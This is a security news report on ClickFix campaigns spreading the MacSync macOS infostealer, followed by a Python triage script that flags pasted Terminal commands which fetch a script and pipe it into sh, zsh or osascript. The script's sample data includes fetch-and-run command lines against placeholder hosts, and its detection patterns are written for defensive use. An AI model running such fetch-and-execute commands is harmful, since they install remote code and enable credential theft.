Three ClickFix campaigns have been observed delivering a macOS infostealer called MacSync, with the latest iteration distributed via ClickFix lures in February 2026 targeting Belgium, India, and parts of North and South America. The campaigns rely on user interaction, such as copying and pasting commands into Terminal, to bypass traditional exploit chains and install MacSync with user-level permissions after a shell script fetches the payload and exfiltrates data.
In November 2025, one campaign used the OpenAI Atlas browser as bait and a fake Google Sites download flow; in December 2025, a malvertising drive redirected users to ChatGPT conversations before leading them to malicious GitHub-themed pages; and in February 2026 a new variant introduced dynamic AppleScript payloads and in‑memory execution to evade static analysis.
The shell script connects to a hard-coded server to retrieve the AppleScript payload while attempting to erase evidence of data theft, with MacSync capable of exfiltrating credentials, files, keychains, and seed phrases from cryptocurrency wallets. According to Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey, the latest variant appears to reflect the malware developer’s adaptation to OS and security measures to maintain effectiveness.
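The behaviour described above (a pasted Terminal command that fetches a script and hands it to a shell or AppleScript interpreter without a file landing on disk) can be triaged from process-execution telemetry. The following is an added example, not code from the article or from Sophos; the rule names, the event fields, and the sample command lines and hosts are constructed assumptions, since the page does not reproduce the campaigns' actual commands.

```python
import re

# Interpreters that run a script from stdin or an argument, i.e. with no file on disk.
_INTERP = r"(?:/\S*/)?(?:sh|bash|zsh|osascript)"
_FETCH = r"(?:/\S*/)?(?:curl|wget)"
_START = r"(?<![\w.:/-])"  # do not start a match inside a URL, path or longer word

RULES = {
    # fetch ... | interpreter
    "fetch_piped_to_interpreter": re.compile(
        rf"{_START}{_FETCH}\s[^|;&]*\|\s*(?:sudo\s+)?{_INTERP}(?![\w.-])"),
    # interpreter ... "$(fetch ...)"  or  interpreter ... `fetch ...`
    "fetch_in_command_substitution": re.compile(
        rf"{_START}{_INTERP}\s[^|;&]*(?:\$\(|`)\s*{_FETCH}\s"),
}

def triage(cmdline):
    """Return the sorted names of the rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(events):
    """Return (event, hits) pairs for events whose command line matches a rule."""
    return [(e, hits) for e in events if (hits := triage(e["cmdline"]))]

# Constructed sample telemetry (hypothetical users, hosts and commands).
SAMPLE_EVENTS = [
    {"user": "alice",
     "cmdline": "curl -fsSL https://cdn.example.invalid/a | osascript"},
    {"user": "bob",
     "cmdline": '/bin/zsh -c "$(curl -fsSL https://cdn.example.invalid/b)"'},
    # Download to disk only: not the in-memory pattern, so not flagged here.
    {"user": "carol",
     "cmdline": "curl -fsSL https://example.invalid/tool.tgz -o /tmp/tool.tgz"},
    {"user": "dave", "cmdline": "osascript -e 'display dialog \"hi\"'"},
    {"user": "erin", "cmdline": "ps aux | grep curl"},
]

if __name__ == "__main__":
    for event, hits in scan(SAMPLE_EVENTS):
        print(event["user"], hits, event["cmdline"])
```

Legitimate installers use the same fetch-and-run shapes, so a hit is a triage signal to review the destination host and what the session did next, not a verdict.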